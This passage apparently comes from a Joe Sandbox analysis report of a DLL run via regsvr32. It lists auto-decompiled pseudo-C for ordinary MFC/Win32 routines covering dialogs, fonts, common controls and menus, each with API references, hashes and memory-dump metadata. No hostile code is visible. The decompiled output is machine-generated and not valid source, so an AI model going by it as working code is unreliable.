                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                            • String ID:
                                                                                                            • API String ID: 3690589370-0
                                                                                                            • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                                                            • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F0D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001F0D1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011BF0(0x1003a3de, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
				}
				_t135 =  *(E100373B5() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E10021D47(_t109, 0x10);
				E10021D47(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E100243B2();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1004efe4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E100237EE();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10022196();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E10024A0E(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10024716(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}





















                                                                                                            0x1001f0d1
                                                                                                            0x1001f0d6
                                                                                                            0x1001f0e6
                                                                                                            0x1001f0e8
                                                                                                            0x1001f0eb
                                                                                                            0x1001f0ee
                                                                                                            0x1001f0f8
                                                                                                            0x1001f0f8
                                                                                                            0x1001f100
                                                                                                            0x1001f108
                                                                                                            0x1001f10b
                                                                                                            0x1001f10e
                                                                                                            0x1001f111
                                                                                                            0x1001f114
                                                                                                            0x1001f11e
                                                                                                            0x1001f125
                                                                                                            0x1001f152
                                                                                                            0x1001f155
                                                                                                            0x1001f155
                                                                                                            0x1001f157
                                                                                                            0x1001f139
                                                                                                            0x1001f139
                                                                                                            0x1001f2cd
                                                                                                            0x1001f2d2
                                                                                                            0x1001f2db
                                                                                                            0x1001f2db
                                                                                                            0x1001f159
                                                                                                            0x1001f15e
                                                                                                            0x1001f168
                                                                                                            0x1001f174
                                                                                                            0x1001f178
                                                                                                            0x1001f185
                                                                                                            0x1001f18a
                                                                                                            0x1001f190
                                                                                                            0x1001f192
                                                                                                            0x1001f1ca
                                                                                                            0x1001f1ca
                                                                                                            0x1001f1cc
                                                                                                            0x1001f20d
                                                                                                            0x1001f20d
                                                                                                            0x1001f211
                                                                                                            0x1001f215
                                                                                                            0x1001f216
                                                                                                            0x1001f21b
                                                                                                            0x1001f21e
                                                                                                            0x1001f220
                                                                                                            0x1001f226
                                                                                                            0x1001f222
                                                                                                            0x1001f222
                                                                                                            0x1001f222
                                                                                                            0x1001f240
                                                                                                            0x1001f242
                                                                                                            0x1001f266
                                                                                                            0x1001f269
                                                                                                            0x1001f26d
                                                                                                            0x1001f26f
                                                                                                            0x1001f277
                                                                                                            0x1001f27a
                                                                                                            0x1001f27c
                                                                                                            0x1001f283
                                                                                                            0x1001f283
                                                                                                            0x1001f27c
                                                                                                            0x1001f289
                                                                                                            0x1001f28e
                                                                                                            0x1001f290
                                                                                                            0x1001f296
                                                                                                            0x1001f296
                                                                                                            0x1001f29c
                                                                                                            0x1001f29e
                                                                                                            0x1001f2a0
                                                                                                            0x1001f2a4
                                                                                                            0x1001f2a7
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2a4
                                                                                                            0x1001f2af
                                                                                                            0x1001f2b2
                                                                                                            0x1001f2b7
                                                                                                            0x1001f2c0
                                                                                                            0x1001f2c0
                                                                                                            0x1001f2c8
                                                                                                            0x1001f2ca
                                                                                                            0x1001f2ca
                                                                                                            0x1001f2ca
                                                                                                            0x00000000
                                                                                                            0x1001f2ca
                                                                                                            0x1001f1ce
                                                                                                            0x1001f1d2
                                                                                                            0x1001f1dd
                                                                                                            0x1001f1e1
                                                                                                            0x1001f1f1
                                                                                                            0x1001f1f4
                                                                                                            0x1001f1f8
                                                                                                            0x1001f1fd
                                                                                                            0x1001f200
                                                                                                            0x1001f20b
                                                                                                            0x1001f20b
                                                                                                            0x00000000
                                                                                                            0x1001f200
                                                                                                            0x1001f194
                                                                                                            0x1001f196
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f19a
                                                                                                            0x1001f1a0
                                                                                                            0x1001f1a2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f1ac
                                                                                                            0x1001f1b3
                                                                                                            0x1001f1b7
                                                                                                            0x1001f1ba
                                                                                                            0x1001f1be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f1c0
                                                                                                            0x1001f1c5
                                                                                                            0x1001f1c7
                                                                                                            0x1001f1c7
                                                                                                            0x00000000
                                                                                                            0x1001f1c5
                                                                                                            0x1001f12c
                                                                                                            0x1001f137
                                                                                                            0x1001f14e
                                                                                                            0x00000000
                                                                                                            0x1001f14e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                                                            • GetSystemMetrics.USER32 ref: 1001F19A
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F205
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 2364537584-76309092
                                                                                                            • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                                                            • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}
















                                                                                                            0x10023123
                                                                                                            0x10023126
                                                                                                            0x10023129
                                                                                                            0x1002312b
                                                                                                            0x10023133
                                                                                                            0x10023139
                                                                                                            0x1002313d
                                                                                                            0x10023142
                                                                                                            0x100231c9
                                                                                                            0x100231ce
                                                                                                            0x100231dd
                                                                                                            0x100231dd
                                                                                                            0x00000000
                                                                                                            0x100231d4
                                                                                                            0x100231d6
                                                                                                            0x100231c4
                                                                                                            0x100231c6
                                                                                                            0x100231df
                                                                                                            0x100231e2
                                                                                                            0x100231e2
                                                                                                            0x100231ce
                                                                                                            0x10023148
                                                                                                            0x1002314b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002314d
                                                                                                            0x10023150
                                                                                                            0x10023163
                                                                                                            0x1002316d
                                                                                                            0x1002316f
                                                                                                            0x10023170
                                                                                                            0x10023182
                                                                                                            0x10023188
                                                                                                            0x1002319b
                                                                                                            0x100231ac
                                                                                                            0x100231af
                                                                                                            0x100231af
                                                                                                            0x100231b9
                                                                                                            0x100231be
                                                                                                            0x100231be
                                                                                                            0x100231b9
                                                                                                            0x1002316d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveFocus$MessageSend
                                                                                                            • String ID: u
                                                                                                            • API String ID: 1556911595-4067256894
                                                                                                            • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                                                            • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0xf3933a06
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                                                            0x10024976
                                                                                                            0x1002497d
                                                                                                            0x10024986
                                                                                                            0x10024989
                                                                                                            0x1002498c
                                                                                                            0x1002498f
                                                                                                            0x10024994
                                                                                                            0x10024998
                                                                                                            0x100249a2
                                                                                                            0x100249b1
                                                                                                            0x100249b5
                                                                                                            0x100249c2
                                                                                                            0x100249c4
                                                                                                            0x100249c6
                                                                                                            0x100249c6
                                                                                                            0x100249e1
                                                                                                            0x100249e3
                                                                                                            0x100249e3
                                                                                                            0x100249e9
                                                                                                            0x100249ee
                                                                                                            0x100249f0
                                                                                                            0x100249f0
                                                                                                            0x10024a0b
                                                                                                            0x10024a0b
                                                                                                            0x1002499c
                                                                                                            0x100249a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 10024994
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                                                            • GetDC.USER32(00000000), ref: 100249B8
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                                                            • ReleaseDC.USER32 ref: 100249E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                                                            • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 40%
                                                                                                            			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                                                            0x10021561
                                                                                                            0x1002156e
                                                                                                            0x10021570
                                                                                                            0x10021576
                                                                                                            0x1002157a
                                                                                                            0x100215d3
                                                                                                            0x1002157c
                                                                                                            0x10021582
                                                                                                            0x10021584
                                                                                                            0x1002158c
                                                                                                            0x100215a9
                                                                                                            0x100215b1
                                                                                                            0x100215b5
                                                                                                            0x100215b9
                                                                                                            0x100215bb
                                                                                                            0x100215c1
                                                                                                            0x100215c1
                                                                                                            0x100215b9
                                                                                                            0x1002158e
                                                                                                            0x1002159d
                                                                                                            0x1002159f
                                                                                                            0x100215a5
                                                                                                            0x100215a5
                                                                                                            0x1002159d
                                                                                                            0x100215c8
                                                                                                            0x00000000
                                                                                                            0x100215ce

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                                                            • #17.COMCTL32 ref: 1002159F
                                                                                                            • #17.COMCTL32 ref: 100215BB
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                            • API String ID: 1437655972-4218389149
                                                                                                            • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                                                            • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

























                                                                                                            0x10032113
                                                                                                            0x10032118
                                                                                                            0x1003211b
                                                                                                            0x10032125
                                                                                                            0x1003212f
                                                                                                            0x10032132
                                                                                                            0x10032149
                                                                                                            0x1003214d
                                                                                                            0x10032152
                                                                                                            0x10032160
                                                                                                            0x10032174
                                                                                                            0x100321bd
                                                                                                            0x100321c0
                                                                                                            0x100321c6
                                                                                                            0x100321cc
                                                                                                            0x100321cf
                                                                                                            0x1003227f
                                                                                                            0x10032280
                                                                                                            0x00000000
                                                                                                            0x10032280
                                                                                                            0x100321db
                                                                                                            0x100321e1
                                                                                                            0x100321e5
                                                                                                            0x100321e8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321f1
                                                                                                            0x1003221b
                                                                                                            0x10032223
                                                                                                            0x10032231
                                                                                                            0x1003222c
                                                                                                            0x1003222e
                                                                                                            0x1003222e
                                                                                                            0x10032233
                                                                                                            0x10032234
                                                                                                            0x10032237
                                                                                                            0x10032238
                                                                                                            0x10032240
                                                                                                            0x10032246
                                                                                                            0x1003224b
                                                                                                            0x1003226a
                                                                                                            0x1003226a
                                                                                                            0x1003226d
                                                                                                            0x00000000
                                                                                                            0x1003226d
                                                                                                            0x10032250
                                                                                                            0x10032265
                                                                                                            0x10032260
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032262
                                                                                                            0x10032262
                                                                                                            0x00000000
                                                                                                            0x10032265
                                                                                                            0x100321f8
                                                                                                            0x100321ff
                                                                                                            0x10032202
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10032209
                                                                                                            0x1003220d
                                                                                                            0x10032210
                                                                                                            0x10032217
                                                                                                            0x00000000
                                                                                                            0x10032217
                                                                                                            0x10032270
                                                                                                            0x10032270
                                                                                                            0x10032273
                                                                                                            0x10032276
